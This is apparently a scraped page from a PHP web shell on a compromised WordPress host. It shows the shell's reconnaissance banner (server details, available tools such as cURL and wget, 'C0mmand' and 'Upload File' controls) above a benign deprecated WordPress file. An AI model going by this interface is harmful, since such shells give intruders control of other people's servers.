|
Server IP : 10.123.20.5 / Your IP : 216.73.216.89 Web Server : Apache System : Linux webm005.cluster123.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64 User : wqgepnx ( 163969) PHP Version : 8.2.31 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/wqgepnx/www/wp-includes/blocks/code/../pattern/../query/../html/../../js/../ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php /** * Core class used for managing HTTP transports and making HTTP requests. * * This file is deprecated, use 'wp-includes/class-wp-http.php' instead. * * @deprecated 5.9.0 * @package WordPress */ _deprecated_file( basename( __FILE__ ), '5.9.0', WPINC . '/class-wp-http.php' ); /** WP_Http class */ require_once ABSPATH . WPINC . '/class-wp-http.php';